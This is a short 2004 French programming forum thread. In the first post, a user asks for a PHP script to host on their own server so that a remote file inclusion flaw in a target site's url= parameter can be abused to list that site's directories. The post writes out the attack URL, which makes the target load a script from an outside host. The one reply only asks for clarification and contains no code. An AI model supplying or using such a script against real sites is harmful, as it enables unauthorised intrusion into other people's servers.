Script PHP URGENT !!!!

shaoling Messages postés 11 Date d'inscription lundi 8 décembre 2003 Statut Membre Dernière intervention 18 mars 2011 - 7 juin 2004 à 22:02
cs_kalachnikov Messages postés 16 Date d'inscription samedi 5 juin 2004 Statut Membre Dernière intervention 23 juin 2004 - 8 juin 2004 à 10:42
Salut, je suis a la recherche d'un script php permettant de lister un répertoire, mais pas n'importe quel script :
un site : http://www.site.com/index.php?url=
qui comporte la faille include, on peut donc afficher n'importe quelle page :
http://www.site.com/index.php?url=http://www.google.com

donc ce que j'aimerai cest un script php permettant de lister un répertoire de ce site, en l'hébergeant sur mon server (http://monsite.free.fr) ce qui ferais :
http://www.site.com/index.php?url=http://monsite.free.fr/script.php

voila
merci beaucoup d'avance pour vos réponse !!

1 réponse

cs_kalachnikov Messages postés 16 Date d'inscription samedi 5 juin 2004 Statut Membre Dernière intervention 23 juin 2004
8 juin 2004 à 10:42
euh j'ai pas compris,
tu veux que script.php localisé sur monsite.free.fr,
permette de lister un répertoire de www.site.com ?

ou alors tu veux qu a partir de www.site.com,
tu puisse voir les dossiers de monsite.free.fr.?

l'ennoncé est pas très clair...
0
Rejoignez-nous